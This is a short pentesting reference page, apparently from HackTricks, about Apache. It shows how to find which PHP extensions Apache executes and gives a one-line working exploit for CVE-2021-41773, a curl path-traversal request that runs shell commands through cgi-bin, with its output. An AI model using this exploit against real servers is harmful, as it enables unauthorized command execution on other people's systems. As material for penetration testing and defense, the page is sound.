HackTricks
Search…
Pentesting
Powered By GitBook
Apache

Executable PHP extensions

Check which extensions is executing the Apache server. To search them you can execute:
1
grep -R -B1 "httpd-php" /etc/apache2
Copied!
Also, some places where you can find this configuration is:
1
/etc/apache2/mods-available/php5.conf
2
/etc/apache2/mods-enabled/php5.conf
3
/etc/apache2/mods-available/php7.3.conf
4
/etc/apache2/mods-enabled/php7.3.conf
Copied!

CVE-2021-41773

1
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
2
uid=1(daemon) gid=1(daemon) groups=1(daemon)
3
Linux
Copied!
Last modified 12d ago